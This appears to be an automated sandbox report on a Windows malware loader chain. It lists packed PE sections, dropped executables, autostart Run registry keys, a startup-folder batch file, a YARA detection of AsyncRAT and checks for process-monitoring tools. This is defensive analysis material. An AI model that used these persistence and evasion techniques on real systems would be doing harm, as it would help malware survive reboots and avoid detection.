Source: Fe36XBk[1].exe.6.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: .idata
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: apuhhdvg
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: pzrtjeve
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: .taggant
Source: Fe36XBk.exe.6.dr	Static PE information: section name:
Source: Fe36XBk.exe.6.dr	Static PE information: section name: .idata
Source: Fe36XBk.exe.6.dr	Static PE information: section name:
Source: Fe36XBk.exe.6.dr	Static PE information: section name: apuhhdvg
Source: Fe36XBk.exe.6.dr	Static PE information: section name: pzrtjeve
Source: Fe36XBk.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: ffzeszud
Source: random[2].exe1.6.dr	Static PE information: section name: ekbstgwf
Source: random[2].exe1.6.dr	Static PE information: section name: .taggant
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name:
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: .idata
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name:
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: ffzeszud
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: ekbstgwf
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: .taggant
Source: random[3].exe0.6.dr	Static PE information: section name:
Source: random[3].exe0.6.dr	Static PE information: section name: .idata
Source: random[3].exe0.6.dr	Static PE information: section name:
Source: random[3].exe0.6.dr	Static PE information: section name: uoivcdbb
Source: random[3].exe0.6.dr	Static PE information: section name: vmdcfodh
Source: random[3].exe0.6.dr	Static PE information: section name: .taggant
Source: 318ea12e54.exe.6.dr	Static PE information: section name:
Source: 318ea12e54.exe.6.dr	Static PE information: section name: .idata
Source: 318ea12e54.exe.6.dr	Static PE information: section name:
Source: 318ea12e54.exe.6.dr	Static PE information: section name: uoivcdbb
Source: 318ea12e54.exe.6.dr	Static PE information: section name: vmdcfodh
Source: 318ea12e54.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe2.6.dr	Static PE information: section name:
Source: random[2].exe2.6.dr	Static PE information: section name: .idata
Source: random[2].exe2.6.dr	Static PE information: section name:
Source: random[2].exe2.6.dr	Static PE information: section name: suvgelxs
Source: random[2].exe2.6.dr	Static PE information: section name: fiofgyly
Source: random[2].exe2.6.dr	Static PE information: section name: .taggant
Source: 7251e9a205.exe.6.dr	Static PE information: section name:
Source: 7251e9a205.exe.6.dr	Static PE information: section name: .idata
Source: 7251e9a205.exe.6.dr	Static PE information: section name:
Source: 7251e9a205.exe.6.dr	Static PE information: section name: suvgelxs
Source: 7251e9a205.exe.6.dr	Static PE information: section name: fiofgyly
Source: 7251e9a205.exe.6.dr	Static PE information: section name: .taggant
Source: random[3].exe1.6.dr	Static PE information: section name:
Source: random[3].exe1.6.dr	Static PE information: section name: .idata
Source: random[3].exe1.6.dr	Static PE information: section name: qkutxjie
Source: random[3].exe1.6.dr	Static PE information: section name: naommcoh
Source: random[3].exe1.6.dr	Static PE information: section name: .taggant
Source: 85abde4902.exe.6.dr	Static PE information: section name:
Source: 85abde4902.exe.6.dr	Static PE information: section name: .idata
Source: 85abde4902.exe.6.dr	Static PE information: section name: qkutxjie
Source: 85abde4902.exe.6.dr	Static PE information: section name: naommcoh
Source: 85abde4902.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0044C050 push edx; ret	23_2_0044C051
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444BF0 push eax; mov dword ptr [esp], A1A0A796h	23_2_00444BF2
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0044EDE8 push edi; iretd	23_2_0044EDF9
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B8088 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B8088 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B80F3 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B80F3 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B8088 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B8088 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B80F3 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B80F3 push eax; ret	35_3_011B8169
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011B8136 push eax; ret	35_3_011B8169

Source: random.exe	Static PE information: section name: entropy: 7.031344075875542
Source: random.exe	Static PE information: section name: nincghsn entropy: 7.952860544320937
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.031344075875542
Source: skotes.exe.0.dr	Static PE information: section name: nincghsn entropy: 7.952860544320937
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: entropy: 7.982773774345633
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: jmpbrfec entropy: 7.953733169673368
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: hzdrddah entropy: 7.954558148161764
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.982773774345633
Source: random[1].exe.6.dr	Static PE information: section name: jmpbrfec entropy: 7.953733169673368
Source: dfd80aba08.exe.6.dr	Static PE information: section name: entropy: 7.982773774345633
Source: dfd80aba08.exe.6.dr	Static PE information: section name: jmpbrfec entropy: 7.953733169673368
Source: random[1].exe0.6.dr	Static PE information: section name: hzdrddah entropy: 7.954558148161764
Source: ae70ca0159.exe.6.dr	Static PE information: section name: hzdrddah entropy: 7.954558148161764
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: entropy: 7.9408125149909985
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: rsigopyg entropy: 7.950281382666304
Source: random[2].exe.6.dr	Static PE information: section name: entropy: 7.9408125149909985
Source: random[2].exe.6.dr	Static PE information: section name: rsigopyg entropy: 7.950281382666304
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: entropy: 7.9408125149909985
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: rsigopyg entropy: 7.950281382666304
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: entropy: 7.966652808119376
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: loqVSeJ.exe.6.dr	Static PE information: section name: entropy: 7.966652808119376
Source: loqVSeJ.exe.6.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: entropy: 7.176601397129594
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: rufmbtlx entropy: 7.95440713647379
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: entropy: 7.176601397129594
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: rufmbtlx entropy: 7.95440713647379
Source: random[4].exe0.6.dr	Static PE information: section name: vhjrfidp entropy: 7.91978051578516
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: vhjrfidp entropy: 7.91978051578516
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048
Source: Fe36XBk.exe.6.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk.exe.6.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048
Source: random[2].exe1.6.dr	Static PE information: section name: entropy: 7.935367712730575
Source: random[2].exe1.6.dr	Static PE information: section name: ffzeszud entropy: 7.952787220972295
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: entropy: 7.935367712730575
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: ffzeszud entropy: 7.952787220972295
Source: random[3].exe0.6.dr	Static PE information: section name: entropy: 7.1743022745677685
Source: random[3].exe0.6.dr	Static PE information: section name: uoivcdbb entropy: 7.953891481395498
Source: 318ea12e54.exe.6.dr	Static PE information: section name: entropy: 7.1743022745677685
Source: 318ea12e54.exe.6.dr	Static PE information: section name: uoivcdbb entropy: 7.953891481395498
Source: random[2].exe2.6.dr	Static PE information: section name: suvgelxs entropy: 7.919220981161672
Source: 7251e9a205.exe.6.dr	Static PE information: section name: suvgelxs entropy: 7.919220981161672

Source: 88823343d6.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: 88823343d6.exe.6.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: random[1].exe2.6.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: random[1].exe2.6.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: e2b0a87ceb.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: e2b0a87ceb.exe.6.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: random[3].exe2.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[3].exe2.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[5].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072563001\4b3b305d14.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072569001\f3f4cac77b.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\loqVSeJ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072564001\77c6b3ca0a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072566001\a4377b3e83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072562001\fbf74eb9d4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File created: C:\Users\user\AppData\Local\Temp\SH77WLPRS5ZSABCE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072558001\7251e9a205.exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File created: C:\Users\user\AppData\Local\Temp\tmp3A5C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File created: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072560001\6ebe63e8d0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072559001\85abde4902.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\dDFw6mJ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File created: C:\Users\user\AppData\Local\Temp\NASZEUB6OXNWYUIRV.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072567001\6bf1f06d50.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File created: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072565001\e6710ad235.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1072557001\318ea12e54.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfd80aba08.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4b3b305d14.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6710ad235.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae70ca0159.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77c6b3ca0a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a4377b3e83.exe	Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
